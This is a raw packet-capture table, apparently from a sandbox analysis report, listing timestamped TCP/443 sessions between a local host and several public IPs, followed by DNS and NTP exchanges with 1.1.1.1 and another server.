                                    Dec 10, 2024 18:13:18.754734039 CET44349745151.101.194.137192.168.2.7
                                    Dec 10, 2024 18:13:18.754755020 CET44349745151.101.194.137192.168.2.7
                                    Dec 10, 2024 18:13:18.754818916 CET49745443192.168.2.7151.101.194.137
                                    Dec 10, 2024 18:13:18.754833937 CET44349745151.101.194.137192.168.2.7
                                    Dec 10, 2024 18:13:18.754882097 CET49745443192.168.2.7151.101.194.137
                                    Dec 10, 2024 18:13:18.766252041 CET44349745151.101.194.137192.168.2.7
                                    Dec 10, 2024 18:13:18.766319036 CET44349745151.101.194.137192.168.2.7
                                    Dec 10, 2024 18:13:18.766329050 CET49745443192.168.2.7151.101.194.137
                                    Dec 10, 2024 18:13:18.766369104 CET49745443192.168.2.7151.101.194.137
                                    Dec 10, 2024 18:13:18.766630888 CET49745443192.168.2.7151.101.194.137
                                    Dec 10, 2024 18:13:18.766645908 CET44349745151.101.194.137192.168.2.7
                                    Dec 10, 2024 18:13:20.053755045 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.057617903 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.057729959 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.057746887 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.069255114 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.069380045 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.069397926 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.078948021 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.079050064 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.079062939 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.089768887 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.089859962 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.089874029 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.103571892 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.103673935 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.103687048 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.113394022 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.113481998 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.113493919 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.168339968 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.173310995 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.177406073 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.177486897 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.177501917 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.229665041 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.229696035 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.247513056 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.247575045 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.247591019 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.252398014 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.252444983 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.252451897 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.260360003 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.260438919 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.260451078 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.272605896 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.272694111 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.272710085 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.286190033 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.286282063 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.286293983 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.299655914 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.299732924 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.299738884 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.313353062 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.313435078 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.313446999 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.327075005 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.327163935 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.327177048 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.340548992 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.340635061 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.340647936 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.353303909 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.353357077 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.353364944 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.365381002 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.365439892 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.365447998 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.376826048 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.376910925 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.376918077 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.388850927 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.388933897 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.388941050 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.400454044 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.400526047 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.400535107 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.425450087 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.425565004 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.425576925 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.429604053 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.429661036 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.429666996 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.438059092 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.438119888 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.438126087 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.446079969 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.446146011 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.446151018 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.453797102 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.453897953 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.453912973 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.461451054 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.461549997 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.461560011 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.468900919 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.468980074 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.468987942 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.476243019 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.476315975 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.476321936 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.483800888 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.483876944 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.483885050 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.491548061 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.491606951 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.491612911 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.493320942 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.493369102 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.495424032 CET49747443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.495444059 CET44349747172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.634555101 CET49729443192.168.2.7172.67.145.201
                                    Dec 10, 2024 18:13:20.675342083 CET44349729172.67.145.201192.168.2.7
                                    Dec 10, 2024 18:13:20.985692024 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.985761881 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:20.985837936 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.986057043 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:20.986074924 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:21.031261921 CET44349729172.67.145.201192.168.2.7
                                    Dec 10, 2024 18:13:21.031349897 CET44349729172.67.145.201192.168.2.7
                                    Dec 10, 2024 18:13:21.031435013 CET49729443192.168.2.7172.67.145.201
                                    Dec 10, 2024 18:13:21.032998085 CET49729443192.168.2.7172.67.145.201
                                    Dec 10, 2024 18:13:21.033013105 CET44349729172.67.145.201192.168.2.7
                                    Dec 10, 2024 18:13:21.073092937 CET49677443192.168.2.720.50.201.200
                                    Dec 10, 2024 18:13:21.170160055 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:21.170214891 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:21.170351028 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:21.170572996 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:21.170591116 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.398817062 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.399152040 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.399180889 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.400300980 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.400365114 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.401715994 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.401905060 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.401911020 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.402139902 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.448052883 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.448081970 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.494919062 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.854573965 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.854737043 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.854883909 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.854927063 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.854927063 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.854947090 CET4434975935.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.854998112 CET49759443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.855567932 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.855602026 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.855696917 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.855895996 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:22.855910063 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:22.905241013 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:22.909219027 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:22.909249067 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:22.909666061 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:22.909682989 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:22.909780025 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:22.909780025 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:22.909799099 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:22.912837982 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:22.912864923 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:22.913191080 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:22.913268089 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:22.913495064 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:22.913510084 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:22.963638067 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:23.994702101 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:23.998323917 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:23.998450041 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:23.998471975 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.010009050 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.010200977 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.010238886 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.019653082 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.019712925 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.019722939 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.032233953 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.032350063 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.032373905 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.063448906 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.063530922 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.063620090 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.063657045 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.063745975 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.071715117 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.114387989 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.114518881 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.114568949 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.115271091 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:24.115526915 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:24.115535975 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:24.115895987 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:24.116240978 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:24.116317987 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:24.116365910 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:24.118609905 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.118680000 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.118695974 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.163321972 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:24.166474104 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:24.166553020 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.186486006 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.191787004 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.191832066 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.191873074 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.191893101 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.191935062 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.201314926 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.224387884 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.224510908 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.224539042 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.241226912 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.241271973 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.241331100 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.241354942 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.241395950 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.245892048 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.261699915 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.261775970 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.261794090 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.270888090 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.270936012 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.270946026 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.282614946 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.282676935 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.282691002 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.295983076 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.296044111 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.296057940 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.308731079 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.308772087 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.308799028 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.308815002 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.308861017 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.320646048 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.333326101 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.333389044 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.333395958 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.333408117 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.333455086 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.345256090 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.368118048 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.368175030 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.368191957 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.372575998 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.372627974 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.372639894 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.375297070 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.375845909 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.375855923 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.383729935 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.383778095 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.383790016 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.390275002 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.390322924 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.390336037 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.398478031 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.398535013 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.398546934 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.406138897 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.406199932 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.406212091 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.412458897 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.412499905 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.412509918 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.418222904 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.418266058 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.418276072 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.427448034 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.427495956 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.427506924 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.432740927 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.432777882 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.432787895 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.432930946 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.432969093 CET44349758172.217.19.225192.168.2.7
                                    Dec 10, 2024 18:13:24.433027029 CET49758443192.168.2.7172.217.19.225
                                    Dec 10, 2024 18:13:24.585464954 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:24.585556984 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:24.585601091 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:24.585961103 CET49765443192.168.2.735.190.80.1
                                    Dec 10, 2024 18:13:24.585978031 CET4434976535.190.80.1192.168.2.7
                                    Dec 10, 2024 18:13:35.515804052 CET4434971018.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:35.515882015 CET4434971018.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:35.515927076 CET49710443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:36.496879101 CET49710443192.168.2.718.165.220.123
                                    Dec 10, 2024 18:13:36.496928930 CET4434971018.165.220.123192.168.2.7
                                    Dec 10, 2024 18:13:55.725575924 CET44349731104.98.116.138192.168.2.7
                                    Dec 10, 2024 18:13:55.725765944 CET49731443192.168.2.7104.98.116.138
                                    Dec 10, 2024 18:14:02.120306969 CET49851443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:14:02.120357037 CET44349851142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:14:02.120487928 CET49851443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:14:02.120806932 CET49851443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:14:02.120821953 CET44349851142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:14:03.838948011 CET44349851142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:14:03.839236975 CET49851443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:14:03.839258909 CET44349851142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:14:03.839612961 CET44349851142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:14:03.839911938 CET49851443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:14:03.839977980 CET44349851142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:14:03.884538889 CET49851443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:14:13.543823004 CET44349851142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:14:13.543911934 CET44349851142.250.181.68192.168.2.7
                                    Dec 10, 2024 18:14:13.544001102 CET49851443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:14:14.498239040 CET49851443192.168.2.7142.250.181.68
                                    Dec 10, 2024 18:14:14.498275042 CET44349851142.250.181.68192.168.2.7
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 10, 2024 18:12:58.401443005 CET53561071.1.1.1192.168.2.7
                                    Dec 10, 2024 18:12:58.432638884 CET53646081.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:01.253494978 CET53589641.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:02.058608055 CET5345253192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:02.058832884 CET5709953192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:02.195506096 CET53534521.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:02.198213100 CET53570991.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:03.484359026 CET5737753192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:03.484672070 CET6087153192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:03.754143953 CET123123192.168.2.740.81.94.65
                                    Dec 10, 2024 18:13:04.188359022 CET53608711.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:04.189183950 CET53573771.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:04.346347094 CET12312340.81.94.65192.168.2.7
                                    Dec 10, 2024 18:13:07.274816990 CET6476253192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:07.274954081 CET5895753192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:07.766129017 CET53647621.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:07.774389029 CET53589571.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:09.895210028 CET6475753192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:09.895611048 CET5663553192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:10.314615965 CET53566351.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:10.315092087 CET53647571.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:14.239778996 CET6430353192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:14.240077019 CET5449153192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:14.381580114 CET53544911.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:14.388910055 CET53643031.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:16.531919956 CET6081953192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:16.532217979 CET6092153192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:16.554666042 CET6013853192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:16.554840088 CET6082953192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:16.668786049 CET53608191.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:16.670351028 CET53609211.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:16.692127943 CET53601381.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:16.719033003 CET53633301.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:16.924081087 CET53608291.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:18.352582932 CET53639591.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:20.722289085 CET6216353192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:20.722461939 CET4933053192.168.2.71.1.1.1
                                    Dec 10, 2024 18:13:20.861710072 CET53621631.1.1.1192.168.2.7
                                    Dec 10, 2024 18:13:20.862097025 CET53493301.1.1.1192.168.2.7
